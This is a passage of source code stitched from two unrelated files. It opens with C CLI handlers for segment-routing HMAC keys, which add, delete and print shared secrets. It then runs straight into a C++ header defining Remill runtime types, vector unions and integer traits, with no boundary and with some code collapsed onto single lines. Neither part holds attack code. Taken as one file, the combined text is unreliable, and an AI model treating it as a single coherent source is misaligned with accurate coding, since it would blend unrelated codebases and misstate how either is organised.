(test_sr_hmac_validate, static) = { .path = "test sr hmac", .short_help = "test sr hmac validate [on|off]", .function = test_sr_hmac_validate_fn, }; /* *INDENT-ON* */ /** * @brief Add or Delete HMAC key * * @param sm ip6_sr_main_t * * @param key_id u32 * @param shared_secret u8 * * @param is_del u8 * * @return retval i32 */ // $$$ fixme shouldn't return i32 i32 sr_hmac_add_del_key (ip6_sr_main_t * sm, u32 key_id, u8 * shared_secret, u8 is_del) { u32 index; ip6_sr_hmac_key_t *key; if (is_del == 0) { /* Specific key in use? Fail. 
  */
      if (key_id && vec_len (sm->hmac_keys) > key_id
	  && sm->hmac_keys[key_id].shared_secret)
	return -2;

      index = key_id;
      key = find_or_add_shared_secret (sm, shared_secret, &index);
      ASSERT (index == key_id);
      return 0;
    }

  /* delete */
  if (key_id)			/* delete by key ID */
    {
      if (vec_len (sm->hmac_keys) <= key_id)
	return -3;
      key = sm->hmac_keys + key_id;
      hash_unset_mem (sm->hmac_key_by_shared_secret, key->shared_secret);
      vec_free (key->shared_secret);
      return 0;
    }

  /* delete by shared secret (no key ID given) */
  index = 0;
  key = find_or_add_shared_secret (sm, shared_secret, &index);
  hash_unset_mem (sm->hmac_key_by_shared_secret, key->shared_secret);
  vec_free (key->shared_secret);
  return 0;
}

/**
 * @brief CLI parser: "sr hmac [del] id <nn> key <str>".
 */
static clib_error_t *
sr_hmac_add_del_key_fn (vlib_main_t * vm,
			unformat_input_t * input, vlib_cli_command_t * cmd)
{
  ip6_sr_main_t *sm = &sr_main;
  u8 is_del = 0;
  u32 key_id = 0;
  u8 key_id_set = 0;
  u8 *shared_secret = 0;
  i32 rv;

  while (unformat_check_input (input) != UNFORMAT_END_OF_INPUT)
    {
      if (unformat (input, "del"))
	is_del = 1;
      else if (unformat (input, "id %d", &key_id))
	key_id_set = 1;
      else if (unformat (input, "key %s", &shared_secret))
	{
	  /* Do not include the trailing NULL byte. Guaranteed interop issue */
	  _vec_len (shared_secret) -= 1;
	}
      else
	break;
    }

  if (is_del == 0 && shared_secret == 0)
    return clib_error_return (0, "shared secret must be set to add a key");

  if (shared_secret == 0 && key_id_set == 0)
    return clib_error_return (0, "shared secret and key id both unset");

  rv = sr_hmac_add_del_key (sm, key_id, shared_secret, is_del);

  /* sr_hmac_add_del_key copies/uses the secret; free the CLI's vector */
  vec_free (shared_secret);

  switch (rv)
    {
    case 0:
      break;

    default:
      return clib_error_return (0, "sr_hmac_add_del_key returned %d", rv);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (sr_hmac, static) = {
  .path = "sr hmac",
  .short_help = "sr hmac [del] id <nn> key <str>",
  .function = sr_hmac_add_del_key_fn,
};
/* *INDENT-ON* */

/**
 * @brief CLI parser for show HMAC key shared secrets
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
show_sr_hmac_fn (vlib_main_t * vm,
		 unformat_input_t * input, vlib_cli_command_t * cmd)
{
  ip6_sr_main_t *sm = &sr_main;
  int i;

  /* key 0 is the reserved "no signature" slot (see sr_init); start at 1 */
  for (i = 1; i < vec_len (sm->hmac_keys); i++)
    {
      if (sm->hmac_keys[i].shared_secret)
	vlib_cli_output (vm, "[%d]: %v", i, sm->hmac_keys[i].shared_secret);
    }

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (show_sr_hmac, static) = {
  .path = "show sr hmac",
  .short_help = "show sr hmac",
  .function = show_sr_hmac_fn,
};
/* *INDENT-ON* */

/**
 * @brief Test for SR debug flag
 *
 * @param vm vlib_main_t *
 * @param input unformat_input_t *
 * @param cmd vlib_cli_command_t *
 *
 * @return error clib_error_t *
 */
static clib_error_t *
test_sr_debug_fn (vlib_main_t * vm,
		  unformat_input_t * input, vlib_cli_command_t * cmd)
{
  ip6_sr_main_t *sm = &sr_main;

  if (unformat (input, "on"))
    sm->is_debug = 1;
  else if (unformat (input, "off"))
    sm->is_debug = 0;
  else
    return clib_error_return (0, "expected on|off in '%U'",
			      format_unformat_error, input);

  vlib_cli_output (vm, "debug trace now %s", sm->is_debug ? "on" : "off");

  return 0;
}

/* *INDENT-OFF* */
VLIB_CLI_COMMAND (test_sr_debug, static) = {
    .path = "test sr debug",
    .short_help = "test sr debug on|off",
    .function = test_sr_debug_fn,
};
/* *INDENT-ON* */

/*
 * fd.io coding-style-patch-verification: ON
 *
 * Local Variables:
 * eval: (c-set-style "gnu")
 * End:
 */
/* * Copyright (c) 2017 Trail of Bits, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #pragma once #include <cstdint> #include <cstring> #include <limits> #include <type_traits> #if defined(__GNUG__) && !defined(__clang__) # define COMPILING_WITH_GCC 1 #else # define COMPILING_WITH_GCC 0 #endif #pragma clang diagnostic push #pragma clang diagnostic fatal "-Wpadded" #include "remill/Arch/Runtime/Definitions.h" struct State; struct Memory; // Address in the source architecture type. We don't use a `uintptr_t` because // that might be specific to the destination architecture type. typedef uint32_t addr32_t; typedef uint64_t addr64_t; typedef IF_64BIT_ELSE(addr64_t, addr32_t) addr_t; typedef IF_64BIT_ELSE(int64_t, int32_t) addr_diff_t; #if defined(__x86_64__) || defined(__i386__) || defined(_M_X86) || \ defined(__arm__) typedef unsigned uint128_t __attribute__((mode(TI))); typedef int int128_t __attribute__((mode(TI))); #elif defined(__aarch64__) typedef __uint128_t uint128_t; typedef __int128_t int128_t; #elif defined(__sparc__) typedef __uint128_t uint128_t; typedef __int128_t int128_t; #else # error "Cannot determine (u)int128_t type of unuspported architecture." 
#endif static_assert(16 == sizeof(uint128_t), "Invalid `uint128_t` size."); static_assert(16 == sizeof(int128_t), "Invalid `int128_t` size."); typedef float float32_t; static_assert(4 == sizeof(float32_t), "Invalid `float32_t` size."); typedef double float64_t; static_assert(8 == sizeof(float64_t), "Invalid `float64_t` size."); typedef long double float128_t; // a long double can be anything from a 128-bit float (on AArch64/Linux) to a 64-bit double (AArch64 MacOS) // to an 80-bit precision wrapped with padding (x86/x86-64). We do not do a static assert on the size // since there are too many options. // A "native_float80_t" is a native type that is closes to approximating // an x86 80-bit float. // when building against CUDA, default to 64-bit float80s #if !defined(__CUDACC__) && (defined(__x86_64__) || defined(__i386__) || defined(_M_X86)) #if defined(__float80) typedef __float80 native_float80_t; #else typedef long double native_float80_t; #endif static_assert(10 <= sizeof(native_float80_t), "Invalid `native_float80_t` size."); #else typedef double native_float80_t; static_assert(8 == sizeof(native_float80_t), "Invalid `native_float80_t` size."); #endif static const int kEightyBitsInBytes = 10; union union_ld { struct { uint8_t data[kEightyBitsInBytes]; // when building against CUDA, default to 64-bit float80s #if !defined(__CUDACC__) && (defined(__x86_64__) || defined(__i386__) || defined(_M_X86)) // We are doing x86 on x86, so we have native x86 FP80s, but they // are not available in raw 80-bit native form. // // To get to the internal FP80 representation, we have to use a // `long double` which is (usually! but not always) // an FP80 padded to a 12 or 16 byte boundary // uint8_t padding[sizeof(native_float80_t) - kEightyBitsInBytes]; #else // The closest native FP type that we can easily deal with is a 64-bit double // this is less than the size of an FP80, so the data variable above will already // enclose it. 
No extra padding is needed #endif } lds __attribute__((packed)); native_float80_t ld; } __attribute__((packed)); struct float80_t final { uint8_t data[kEightyBitsInBytes]; inline ~float80_t(void) = default; inline float80_t(void) : data{0,} {} float80_t(const float80_t &) = default; float80_t &operator=(const float80_t &) = default; inline float80_t(native_float80_t ld) { union_ld ldu; std::memset(&ldu, 0, sizeof(ldu)); // zero out ldu to make padding consistent ldu.ld = ld; // assign native value // copy the representation to this object std::memcpy(&data[0], &ldu.lds.data[0], sizeof(data)); } operator native_float80_t() { union_ld ldu; std::memset(&ldu, 0, sizeof(ldu)); // zero out ldu to make padding consistent // copy the internal representation into the union std::memcpy(&ldu.lds.data[0], &data[0], sizeof(data)); // extract the native backing type from it return ldu.ld; } } __attribute__((packed)); union nan32_t { float32_t f; struct { uint32_t payload : 22; uint32_t is_quiet_nan : 1; uint32_t exponent : 8; uint32_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float32_t) == sizeof(nan32_t), "Invalid packing of `nan32_t`."); union nan64_t { float64_t d; struct { uint64_t payload : 51; uint64_t is_quiet_nan : 1; uint64_t exponent : 11; uint64_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float64_t) == sizeof(nan64_t), "Invalid packing of `nan64_t`."); union nan80_t { float80_t d; struct { uint64_t payload : 62; uint64_t is_quiet_nan : 1; uint64_t interger_bit : 1; uint64_t exponent : 15; uint64_t is_negative : 1; } __attribute__((packed)); } __attribute__((packed)); static_assert(sizeof(float80_t) == sizeof(nan80_t), "Invalid packing of `nan80_t`."); // Note: We are re-defining the `std::is_signed` type trait because we can't // always explicitly specialize it inside of the `std` namespace. 
// Portable replacements for `std::is_signed` / `std::is_unsigned`. Under
// Intel PIN (`__PIN__`) only the TR1 flavors of the traits are available.
template <typename T>
struct is_signed {
#ifdef __PIN__
  static constexpr bool value = std::tr1::is_signed<T>::value;
#else
  static constexpr bool value = std::is_signed<T>::value;
#endif
};

template <typename T>
struct is_unsigned {
#ifdef __PIN__
  static constexpr bool value = std::tr1::is_unsigned<T>::value;
#else
  static constexpr bool value = std::is_unsigned<T>::value;
#endif
};

// The standard traits don't necessarily know about the compiler-specific
// 128-bit integer types, so specialize the signedness explicitly.
template <>
struct is_signed<int128_t> {
  static constexpr bool value = true;
};

template <>
struct is_unsigned<int128_t> {
  static constexpr bool value = false;
};

template <>
struct is_signed<uint128_t> {
  static constexpr bool value = false;
};

template <>
struct is_unsigned<uint128_t> {
  static constexpr bool value = true;
};

// Maps a concrete vector type (e.g. `uint32v4_t`) to its element count, its
// base (element) type, and the generic `vecN_t` union of the same bit width.
// Specializations are generated by `MAKE_VECTOR` below.
template <typename T>
struct VectorType;

// Strip references and const so lookups work on qualified vector values.
template <typename T>
struct VectorType<T &> : public VectorType<T> {};

template <typename T>
struct VectorType<const T> : public VectorType<T> {};

// Forward-declaration of basic vector types.
union vec8_t;
union vec16_t;
union vec32_t;
union vec64_t;
union vec128_t;
union vec256_t;
union vec512_t;

// Defines the packed vector struct `<prefix>v<nelems>_t`, checks its size at
// compile time, and registers it with the `VectorType` trait.
//   base_type     -- element type (e.g. `uint32_t`)
//   prefix        -- name prefix (e.g. `uint32`)
//   nelems        -- number of elements
//   vec_size_bits -- total width in bits; selects the `vecN_t` union
//   width_bytes   -- total width in bytes (must equal vec_size_bits / 8)
#define MAKE_VECTOR(base_type, prefix, nelems, vec_size_bits, width_bytes) \
  struct prefix##v##nelems##_t final { \
    base_type elems[nelems]; \
  } __attribute__((packed)); \
\
  static_assert(width_bytes == sizeof(prefix##v##nelems##_t), \
                "Invalid definition of `" #prefix "v" #nelems "`."); \
\
  static_assert((width_bytes * 8) == vec_size_bits, \
                "Invalid definition of `" #prefix "v" #nelems "`."); \
\
  template <> \
  struct VectorType<prefix##v##nelems##_t> { \
    enum : std::size_t { kNumElems = nelems }; \
    typedef base_type BT; \
    typedef base_type BaseType; \
    typedef vec##vec_size_bits##_t T; \
    typedef vec##vec_size_bits##_t Type; \
  };

// Unsigned integer element vectors, 8 through 512 bits total.
MAKE_VECTOR(uint8_t, uint8, 1, 8, 1)
MAKE_VECTOR(uint8_t, uint8, 2, 16, 2)
MAKE_VECTOR(uint8_t, uint8, 4, 32, 4)
MAKE_VECTOR(uint8_t, uint8, 8, 64, 8)
MAKE_VECTOR(uint8_t, uint8, 16, 128, 16)
MAKE_VECTOR(uint8_t, uint8, 32, 256, 32)
MAKE_VECTOR(uint8_t, uint8, 64, 512, 64)

MAKE_VECTOR(uint16_t, uint16, 1, 16, 2)
MAKE_VECTOR(uint16_t, uint16, 2, 32, 4)
MAKE_VECTOR(uint16_t, uint16, 4, 64, 8)
MAKE_VECTOR(uint16_t, uint16, 8, 128, 16)
MAKE_VECTOR(uint16_t, uint16, 16, 256, 32)
MAKE_VECTOR(uint16_t, uint16, 32, 512, 64)

MAKE_VECTOR(uint32_t, uint32, 1, 32, 4)
MAKE_VECTOR(uint32_t, uint32, 2, 64, 8)
MAKE_VECTOR(uint32_t, uint32, 4, 128, 16)
MAKE_VECTOR(uint32_t, uint32, 8, 256, 32)
MAKE_VECTOR(uint32_t, uint32, 16, 512, 64)

MAKE_VECTOR(uint64_t, uint64, 1, 64, 8)
MAKE_VECTOR(uint64_t, uint64, 2, 128, 16)
MAKE_VECTOR(uint64_t, uint64, 4, 256, 32)
MAKE_VECTOR(uint64_t, uint64, 8, 512, 64)

// A zero-element 128-bit vector makes no sense, so the smallest 128-bit
// element vector starts at one element.
//MAKE_VECTOR(uint128_t, uint128, 0, 64, 8);
MAKE_VECTOR(uint128_t, uint128, 1, 128, 16)
MAKE_VECTOR(uint128_t, uint128, 2, 256, 32)
MAKE_VECTOR(uint128_t, uint128, 4, 512, 64)

// Signed integer element vectors.
MAKE_VECTOR(int8_t, int8, 1, 8, 1)
MAKE_VECTOR(int8_t, int8, 2, 16, 2)
MAKE_VECTOR(int8_t, int8, 4, 32, 4)
MAKE_VECTOR(int8_t, int8, 8, 64, 8)
MAKE_VECTOR(int8_t, int8, 16, 128, 16)
MAKE_VECTOR(int8_t, int8, 32, 256, 32)
MAKE_VECTOR(int8_t, int8, 64, 512, 64)

MAKE_VECTOR(int16_t, int16, 1, 16, 2)
MAKE_VECTOR(int16_t, int16, 2, 32, 4)
MAKE_VECTOR(int16_t, int16, 4, 64, 8)
MAKE_VECTOR(int16_t, int16, 8, 128, 16)
MAKE_VECTOR(int16_t, int16, 16, 256, 32)
MAKE_VECTOR(int16_t, int16, 32, 512, 64)

MAKE_VECTOR(int32_t, int32, 1, 32, 4)
MAKE_VECTOR(int32_t, int32, 2, 64, 8)
MAKE_VECTOR(int32_t, int32, 4, 128, 16)
MAKE_VECTOR(int32_t, int32, 8, 256, 32)
MAKE_VECTOR(int32_t, int32, 16, 512, 64)

MAKE_VECTOR(int64_t, int64, 1, 64, 8)
MAKE_VECTOR(int64_t, int64, 2, 128, 16)
MAKE_VECTOR(int64_t, int64, 4, 256, 32)
MAKE_VECTOR(int64_t, int64, 8, 512, 64)

//MAKE_VECTOR(int128_t, int128, 0, 64, 8);
MAKE_VECTOR(int128_t, int128, 1, 128, 16)
MAKE_VECTOR(int128_t, int128, 2, 256, 32)
MAKE_VECTOR(int128_t, int128, 4, 512, 64)

// Single-precision floating point element vectors.
MAKE_VECTOR(float, float32, 1, 32, 4)
MAKE_VECTOR(float, float32, 2, 64, 8)
MAKE_VECTOR(float, float32, 4, 128, 16)
MAKE_VECTOR(float, float32, 8, 256, 32)
MAKE_VECTOR(float, float32, 16, 512, 64)
MAKE_VECTOR(double, float64, 1, 64, 8); MAKE_VECTOR(double, float64, 2, 128, 16); MAKE_VECTOR(double, float64, 4, 256, 32); MAKE_VECTOR(double, float64, 8, 512, 64); #define NumVectorElems(val) \ static_cast<addr_t>(VectorType<decltype(val)>::kNumElems) #pragma clang diagnostic push #pragma clang diagnostic ignored "-Wunused-private-field" union vec8_t final { uint8v1_t bytes; int8v1_t sbytes; } __attribute__((packed)); static_assert(1 == sizeof(vec8_t), "Invalid structure packing of `vec8_t`."); union vec16_t final { uint8v2_t bytes; uint16v1_t words; int8v2_t sbytes; int16v1_t swords; } __attribute__((packed)); static_assert(2 == sizeof(vec16_t), "Invalid structure packing of `vec16_t`."); union vec32_t final { // Make this type look like an `[1 x i32]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. uint32v1_t dwords; uint8v4_t bytes; uint16v2_t words; float32v1_t floats; int8v4_t sbytes; int16v2_t swords; int32v1_t sdwords; } __attribute__((packed)); static_assert(4 == sizeof(vec32_t), "Invalid structure packing of `vec32_t`."); union vec64_t final { // Make this type look like an `[1 x i64]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. uint64v1_t qwords; uint8v8_t bytes; uint16v4_t words; uint32v2_t dwords; float32v2_t floats; float64v1_t doubles; int8v8_t sbytes; int16v4_t swords; int32v2_t sdwords; int64v1_t sqwords; } __attribute__((packed)); #pragma clang diagnostic pop static_assert(8 == sizeof(vec64_t), "Invalid structure packing of `vec64_t`."); union vec128_t final { // Make this type look like an `[1 x i128]` to LLVM. This is important for // the cross-block alias analysis performed by remill-opt, as it enables // remill-opt to more easily handle false dependencies. 
uint128v1_t dqwords; uint8v16_t bytes; uint16v8_t words; uint32v4_t dwords; uint64v2_t qwords; float32v4_t floats; float64v2_t doubles; int8v16_t sbytes; int16v8_t swords; int32v4_t sdwords; int64v2_t sqwords; int128v1_t sdqwords; } __attribute__((packed)); static_assert(16 == sizeof(vec128_t), "Invalid structure packing of `vec128_t`."); union vec256_t final { uint8v32_t bytes; uint16v16_t words; uint32v8_t dwords; uint64v4_t qwords; uint128v2_t dqwords; float32v8_t floats; float64v4_t doubles; int8v32_t sbytes; int16v16_t swords; int32v8_t sdwords; int64v4_t sqwords; int128v2_t sdqwords; } __attribute__((packed)); static_assert(32 == sizeof(vec256_t), "Invalid structure packing of `vec256_t`."); union vec512_t final { uint8v64_t bytes; uint16v32_t words; uint32v16_t dwords; uint64v8_t qwords; uint128v4_t dqwords; float32v16_t floats; float64v8_t doubles; int8v64_t sbytes; int16v32_t swords; int32v16_t sdwords; int64v8_t sqwords; int128v4_t sdqwords; } __attribute__((packed)); static_assert(64 == sizeof(vec512_t) && 64 == sizeof(vec512_t().bytes) && 64 == sizeof(vec512_t().words) && 64 == sizeof(vec512_t().dwords) && 64 == sizeof(vec512_t().qwords) && 64 == sizeof(vec512_t().dqwords) && 64 == sizeof(vec512_t().floats) && 64 == sizeof(vec512_t().doubles), "Invalid structure packing of `vec512_t`."); // An n-bit memory reference. This is implemented as an `addr_t`. Part of the // reason is because pointers have sizes that are architecture-specific, and // because we want to be able to pass the address through an integer register // and only access the addressed memory if/when needed. 
// Read-only n-bit memory operand (see the note above about why this is an
// `addr_t` rather than a pointer).
template <typename T>
struct Mn final {
  addr_t addr;
};

// Read-only vector memory operand.
template <typename T>
struct MVn final {
  addr_t addr;
};

// Writable n-bit memory operand.
template <typename T>
struct MnW final {
  addr_t addr;
};

// Writable vector memory operand.
template <typename T>
struct MVnW final {
  addr_t addr;
};

// Read-only register operand; the second (defaulted) parameter selects the
// `Rn<T, true>` widening-to-`addr_t` form for register-sized scalars.
template <typename T, bool = sizeof(T) <= sizeof(addr_t)>
struct Rn;

// Note: We use `addr_t` as the internal type for `Rn` and `In` struct templates
//       because this will be the default register size used for parameter
//       passing in the underlying ABI that Clang chooses to use when converting
//       this code to bitcode. We want to avoid the issue where a size that's
//       too small, e.g. `uint8_t` or `uint16_t` in a struct, is passed as an
//       aligned pointer to a `byval` parameter.
template <typename T>
struct Rn<T, true> final {
  const addr_t val;
};

// Register operand wider than `addr_t` (e.g. 128-bit): keep the exact type.
template <typename T>
struct Rn<T, false> final {
  const T val;
};

// Writable register operand; writes go through the pointed-to storage.
template <typename T>
struct RnW final {
  T *const val_ref;
};

// Floating point register operands keep their exact FP type rather than
// being widened to `addr_t`.
template <>
struct Rn<float32_t> final {
  const float32_t val;
};

template <>
struct Rn<float64_t> final {
  const float64_t val;
};

template <>
struct Rn<float80_t> final {
  const float80_t val;
};

template <>
struct RnW<float32_t> final {
  float32_t *const val_ref;
};

template <>
struct RnW<float64_t> final {
  float64_t *const val_ref;
};

// Immediate operand; widened to `addr_t` for the same ABI reason as `Rn`.
template <typename T>
struct In final {
  const addr_t val;
};

// Okay so this is *kind of* a hack. The idea is that, in some cases, we want
// to pass things like 32- or 64-bit GPRs to instructions taking in vectors,
// and so it would be nice if those values could masquerade as vectors, even
// though the translator will pass in registers.
template <typename T>
struct RVn;

template <>
struct RVn<vec64_t> final {
  const uint64_t val;  // Must be 64 bits.
};

template <>
struct RVn<vec32_t> final {
  const addr_t val;  // Scales to "natural" machine word length.
};

template <>
struct RVn<vec16_t> final {
  const addr_t val;  // Scales to "natural" machine word length.
};

template <>
struct RVn<vec8_t> final {
  const addr_t val;  // Scales to "natural" machine word length.
};

// Writable GPR-masquerading-as-vector operand.
template <typename T>
struct RVnW;

template <>
struct RVnW<vec32_t> final {
  uint32_t *const val_ref;
};

template <>
struct RVnW<vec64_t> final {
  uint64_t *const val_ref;
};

// A `void` pointer is used so that we can treat different vector types
// uniformly (from the LLVM bitcode side). That is, the type of value passed
// in may be a pointer to a wider vector than was is specified by `T`.
template <typename T>
struct Vn final {
  const void *const val;
};

// Writable vector register operand (same `void *` erasure as `Vn`).
template <typename T>
struct VnW final {
  void *const val_ref;
};

// Used to figure out the "base type" of an aggregate type (e.g. vector of BT)
// or of an integral/float type. Strips qualifiers, references, pointers, and
// all of the operand wrappers above down to the underlying value type `BT`.
template <typename T>
struct BaseType {
  typedef T BT;
};

template <typename T>
struct BaseType<volatile T> : public BaseType<T> {};

template <typename T>
struct BaseType<const T> : public BaseType<T> {};

template <typename T>
struct BaseType<T &> : public BaseType<T> {};

template <typename T>
struct BaseType<T *> : public BaseType<T> {};

template <typename T>
struct BaseType<Mn<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<MnW<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<MVn<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<MVnW<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<Rn<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<RnW<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<In<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<Vn<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<VnW<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<RVn<T>> : public BaseType<T> {};

template <typename T>
struct BaseType<RVnW<T>> : public BaseType<T> {};

// Integer width/signedness conversion traits; specializations are generated
// by the macros below.
template <typename T>
struct NextLargerIntegerType;

template <typename T>
struct NextSmallerIntegerType;

template <typename T>
struct SignedIntegerType;

template <typename T>
struct UnsignedIntegerType;

// Registers the signed <-> unsigned mapping between two same-width integer
// types, with compile-time checks that the pair really is one of each.
#define MAKE_SIGNED_INT_CHANGERS(signed_type, unsigned_type) \
  static_assert(sizeof(signed_type) == sizeof(unsigned_type), \
                "Invalid int changer type type."); \
  static_assert( \
      is_signed<signed_type>::value != is_signed<unsigned_type>::value, \
      "Sign match between int type and next int type."); \
  template <> \
  struct SignedIntegerType<unsigned_type> { \
    typedef signed_type BT; \
  }; \
  template <> \
  struct SignedIntegerType<signed_type> { \
    typedef signed_type BT; \
  }; \
  template <> \
  struct UnsignedIntegerType<signed_type> { \
    typedef unsigned_type BT; \
  }; \
  template <> \
  struct UnsignedIntegerType<unsigned_type> { \
    typedef unsigned_type BT; \
  };

// Registers the next-larger/next-smaller relationship between two integer
// types of the same signedness, where `next` is exactly twice as wide.
#define MAKE_INT_TYPE(cur, next) \
  static_assert(sizeof(next) == (2 * sizeof(cur)), "Invalid next int type."); \
  static_assert(is_signed<cur>::value == is_signed<next>::value, \
                "Sign mismatch between int type and next int type."); \
  template <> \
  struct NextLargerIntegerType<cur> { \
    typedef next BT; \
  }; \
  template <> \
  struct NextSmallerIntegerType<next> { \
    typedef cur BT; \
  };

MAKE_SIGNED_INT_CHANGERS(int8_t, uint8_t)
MAKE_SIGNED_INT_CHANGERS(int16_t, uint16_t)
MAKE_SIGNED_INT_CHANGERS(int32_t, uint32_t)
MAKE_SIGNED_INT_CHANGERS(int64_t, uint64_t)
MAKE_SIGNED_INT_CHANGERS(int128_t, uint128_t)

MAKE_INT_TYPE(int8_t, int16_t)
MAKE_INT_TYPE(uint8_t, uint16_t)

MAKE_INT_TYPE(int16_t, int32_t)
MAKE_INT_TYPE(uint16_t, uint32_t)

MAKE_INT_TYPE(int32_t, int64_t)
MAKE_INT_TYPE(uint32_t, uint64_t)

MAKE_INT_TYPE(int64_t, int128_t)
MAKE_INT_TYPE(uint64_t, uint128_t)

// Spot-check the generated widening/narrowing chain.
static_assert(sizeof(NextLargerIntegerType<uint8_t>::BT) == 2, "Bad type.");
static_assert(sizeof(NextLargerIntegerType<uint16_t>::BT) == 4, "Bad type.");
static_assert(sizeof(NextLargerIntegerType<uint32_t>::BT) == 8, "Bad type.");
static_assert(sizeof(NextLargerIntegerType<uint64_t>::BT) == 16, "Bad type.");

static_assert(sizeof(NextSmallerIntegerType<uint16_t>::BT) == 1, "Bad type.");
static_assert(sizeof(NextSmallerIntegerType<uint32_t>::BT) == 2, "Bad type.");
static_assert(sizeof(NextSmallerIntegerType<uint64_t>::BT) == 4, "Bad type.");
static_assert(sizeof(NextSmallerIntegerType<uint128_t>::BT) == 8, "Bad type.");

#undef MAKE_SIGNED_INT_CHANGERS
#undef MAKE_INT_TYPE

// 128 bits is the widest integer supported, so "next larger" saturates at
// the 128-bit types instead of being left undefined.
template <>
struct NextLargerIntegerType<uint128_t> {
  typedef uint128_t BT;
};

template <>
struct NextLargerIntegerType<int128_t> {
  typedef int128_t BT;
};

// General integer type info. Useful for quickly changing between different
// integer types. Given any integer-ish `T`, exposes:
//   BT         -- the base type (qualifiers/wrappers stripped)
//   UT / ST    -- unsigned / signed variants of BT
//   WBT        -- the next wider type (saturates at 128 bits)
//   WUT / WST  -- unsigned / signed variants of WBT
//   kNumBits   -- width of BT in bits
template <typename T>
struct IntegerType {
  typedef typename BaseType<T>::BT BT;
  typedef typename UnsignedIntegerType<BT>::BT UT;
  typedef typename SignedIntegerType<BT>::BT ST;

  typedef typename NextLargerIntegerType<BT>::BT WBT;
  typedef typename UnsignedIntegerType<WBT>::BT WUT;
  typedef typename SignedIntegerType<WBT>::BT WST;

  enum : std::size_t { kNumBits = sizeof(BT) * 8 };
};

// `bool` is treated as an 8-bit unsigned integer.
template <>
struct IntegerType<bool> : public IntegerType<uint8_t> {};

#if __APPLE__

/*
 * In parts of the code, we create IntegerType<size_t>.
 * On OS X, size_t is the same as unsigned long, which is
 * 8 bytes. This code defines IntegerType for size_t.
 */

// Selects the fixed-width IntegerType matching sizeof(size_t).
template <int>
struct SizeTEquivalent;

template <>
struct SizeTEquivalent<4> {
  typedef IntegerType<uint32_t> T;
};

template <>
struct SizeTEquivalent<8> {
  typedef IntegerType<uint64_t> T;
};

template <>
struct IntegerType<size_t> : public SizeTEquivalent<sizeof(size_t)>::T {};

#endif  // __APPLE__

#if !COMPILING_WITH_GCC

// User-defined literal suffixes for building exactly-typed integer constants,
// e.g. `1_u8`, `0xFF_u64`. Not available when compiling with GCC.
inline uint8_t operator"" _u8(unsigned long long value) {
  return static_cast<uint8_t>(value);
}

inline uint16_t operator"" _u16(unsigned long long value) {
  return static_cast<uint16_t>(value);
}

inline uint32_t operator"" _u32(unsigned long long value) {
  return static_cast<uint32_t>(value);
}

inline uint64_t operator"" _u64(unsigned long long value) {
  return static_cast<uint64_t>(value);
}

// NOTE(review): returns `uint64_t` but casts through `addr_t` — presumably
// `addr_t` is at most 64 bits so the result is widened back losslessly;
// confirm whether the return type was intended to be `addr_t`.
inline uint64_t operator"" _addr_t(unsigned long long value) {
  return static_cast<addr_t>(value);
}

inline uint128_t operator"" _u128(unsigned long long value) {
  return static_cast<uint128_t>(value);
}

inline int8_t operator"" _s8(unsigned long long value) {
  return static_cast<int8_t>(value);
}

inline int16_t operator"" _s16(unsigned long long value) {
  return static_cast<int16_t>(value);
}

inline int32_t operator"" _s32(unsigned long long value) {
  return static_cast<int32_t>(value);
}

inline int64_t operator"" _s64(unsigned long long value) {
  return static_cast<int64_t>(value);
}

inline int128_t operator"" _s128(unsigned long long value) {
  return static_cast<int128_t>(value);
}

// Shorthand for the stripped base type of `T` (see `BaseType` above).
# define auto_t(T) typename BaseType<T>::BT

#endif  // COMPILING_WITH_GCC

#pragma clang diagnostic pop